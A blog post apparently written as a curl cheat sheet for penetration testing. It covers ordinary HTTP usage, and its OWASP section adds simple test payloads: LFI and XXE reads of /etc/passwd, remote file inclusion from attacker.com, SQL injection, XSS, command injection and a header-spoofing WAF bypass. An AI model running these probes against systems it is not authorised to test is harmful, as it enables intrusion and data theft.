lazyhacker 1 year ago

Curl Command Cheat Sheet for Penetration Testing

Curl is a command-line tool for making HTTP requests. It is widely used for testing APIs, downloading files, and performing various web-related tasks. Below is a cheat sheet to help you use curl effectively:

**Curl Command Cheat Sheet:**

# Simple GET request:
curl <URL>

# Save output to a file:
curl -o <filename> <URL>

# Follow redirects:
curl -L <URL>

# Custom HTTP method:
curl -X <METHOD> <URL>

# Include headers:
curl -H "Header-Name: Header-Value" <URL>

# Include multiple headers:
curl -H "Header1: Value1" -H "Header2: Value2" <URL>

# Set request data with POST method:
curl -X POST -d "key1=value1&key2=value2" <URL>

# Send JSON data:
curl -X POST -H "Content-Type: application/json" -d '{"key": "value"}' <URL>

# Send data from a file:
curl -X POST -d @<filename> <URL>

# Basic authentication:
curl -u username:password <URL>

# Include a user agent:
curl -A "User-Agent-String" <URL>

# Show request and response headers:
curl -v <URL>

# Show only response headers:
curl -I <URL>

# Set request timeout:
curl --max-time <seconds> <URL>

# Ignore SSL certificate validation:
curl -k <URL>

# Download multiple files concurrently:
curl -O <URL1> -O <URL2>

# Display progress during download:
curl -# -O <URL>

# Download a file with a custom name:
curl -o <custom-name> <URL>

# Upload a file with PUT method:
curl -X PUT -T <file> <URL>

# Set custom user agent:
curl -H "User-Agent: Custom-UA" <URL>

HTTP methods (GET, POST, PUT, DELETE, PATCH, HEAD, OPTIONS)

# GET Request
curl -X GET https://api.example.com/data

# POST Request
curl -X POST -d "param1=value1&param2=value2" https://api.example.com/data

# PUT Request
curl -X PUT -d "param1=value1&param2=value2" https://api.example.com/data

# DELETE Request
curl -X DELETE https://api.example.com/data

# PATCH Request
curl -X PATCH -d "param1=new_value1" https://api.example.com/data

# HEAD Request
curl -X HEAD https://api.example.com/data

# OPTIONS Request
curl -X OPTIONS https://api.example.com/data

Checking HTTP security Header Security

# Checking HTTP Strict Transport Security (HSTS) header
curl -I https://example.com

# Checking Content Security Policy (CSP) header
curl -I https://example.com

# Checking X-Content-Type-Options header
curl -I https://example.com

# Checking X-Frame-Options header
curl -I https://example.com

# Checking X-XSS-Protection header
curl -I https://example.com

# Checking Referrer-Policy header
curl -I https://example.com

# Checking Feature-Policy header
curl -I https://example.com

# Checking Cross-Origin-Resource-Policy (CORP) header
curl -I https://example.com

# Checking Cross-Origin-Embedder-Policy (COEP) header
curl -I https://example.com

# Checking Cross-Origin-Opener-Policy (COOP) header
curl -I https://example.com

# Checking Expect-CT header
curl -I https://example.com

# Checking Public Key Pinning Extension for HTTP (HPKP) header
curl -I https://example.com

Curl Command Cheat Sheet for OWASP top 10

# GET Request with Cookies and User-Agent:
curl -X GET -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" -H "Cookie: name=value; name2=value2" <URL>

# POST Request with Custom Headers and Data:
curl -X POST -H "Content-Type: application/x-www-form-urlencoded" -H "Authorization: Bearer <TOKEN>" -d "username=user&password=pass" <URL>

# Sending Data as JSON and Receiving Pretty JSON Output:
curl -X POST -H "Content-Type: application/json" -d '{"key": "value"}' <URL> | jq .

# Follow Redirects and Display Response Headers:
curl -iL <URL>

# Send Request with Basic Authentication:
curl -X GET -u username:password <URL>

# Testing for Local File Inclusion (LFI) Vulnerabilities:
curl -X GET <URL>/page.php?page=/etc/passwd

# Testing for Remote File Inclusion (RFI) Vulnerabilities:
curl -X GET <URL>/page.php?url=http://attacker.com/malicious-code.txt

# Checking for SSRF (Server-Side Request Forgery):
curl -X GET "http://vulnerable.com/api?url=http://internal-server/"

# Testing for SQL Injection (GET Request):
curl -X GET "<URL>?id=1' OR '1'='1"

# Testing for SQL Injection (POST Request):
curl -X POST -d "username=admin' OR '1'='1&password=test" <URL>

# Testing for Cross-Site Scripting (XSS) Vulnerabilities:
curl -X GET -d "input=<script>alert('XSS');</script>" <URL>

# Testing for Server-Side Template Injection (SSTI):
curl -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "user={{7*7}}" <URL>

# Checking for Open Redirect Vulnerabilities:
curl -X GET <URL>?redirect=http://evil.com

# Testing for Command Injection (Basic Test):
curl -X GET "<URL>?input=test; whoami"

# Uploading a File with File Upload Functionality:
curl -X POST -F "file=@/path/to/local-file" <URL>

# Bypassing Web Application Firewalls (WAF):
curl -X GET -H "X-Forwarded-For: <malicious-IP>" <URL>

# Testing for Cross-Origin Resource Sharing (CORS) Misconfigurations:
curl -X GET -H "Origin: evil.com" <URL>

curl commands for text manipulation

# Writing Response to a File with No Progress Output:
curl -s -o <output-file> <URL>

# Displaying Response Headers Only:
curl -I <URL>

# Displaying Only HTTP Response Code:
curl -o /dev/null -w "%{http_code}" <URL>

# Follow Redirects, but Limit Redirects to a Specified Number:
curl -L -s -m <max-redirects> <URL>

# Using a Specific Network Interface for the Request:
curl --interface <interface-name> <URL>

# Using a Specific DNS Server for Resolution:
curl --dns-servers <dns-server-ip> <URL>

# Making a Request with a Specific HTTP Version:
curl --http1.0 <URL>
curl --http2 <URL>

# Sending Data from a File with Raw Format:
curl -X POST --data-binary "@<file-path>" <URL>

# Using Custom HTTP Headers from a File:
curl -X GET -H "@<header-file>" <URL>

# Testing for XML External Entity (XXE) Vulnerabilities:
curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>' <URL>

# Testing for Server-Side Request Forgery (SSRF) with Time Delay:
curl -X GET "http://vulnerable.com/api?url=http://attacker.com/malicious-code.txt" -m 10

# Testing for HTTP Methods Misconfiguration (PUT, DELETE, etc.):
curl -X PUT -d "data=secret" <URL>

# Using a Specific User-Agent for the Request:
curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" <URL>

# Adding a Custom Host Header:
curl -H "Host: example.com" <URL>

# Using a Specific Proxy for the Request:
curl -x <proxy-url>:<port> <URL>

# Sending a Form with Multiple Fields:
curl -X POST -d "username=user&password=pass&other_field=value" <URL>

# Testing for HTTP Header Injection:
curl -X GET -H "Header: Malicious-Header%0d%0aInjection: value" <URL>"
0
2.8K
Understanding API Authentication: A Guide to Cookie-Based,jwt

Understanding API Authentication: A Guide to Cookie-Based,jwt

defaultuser.png
X0NE
1 year ago
one-line web server

one-line web server

defaultuser.png
lazyhacker
1 year ago
Burp Suite

Burp Suite

defaultuser.png
Admin
8 months ago
DNS HIJACKING

DNS HIJACKING

defaultuser.png
Admin
8 months ago
Metasploit

Metasploit

defaultuser.png
Admin
8 months ago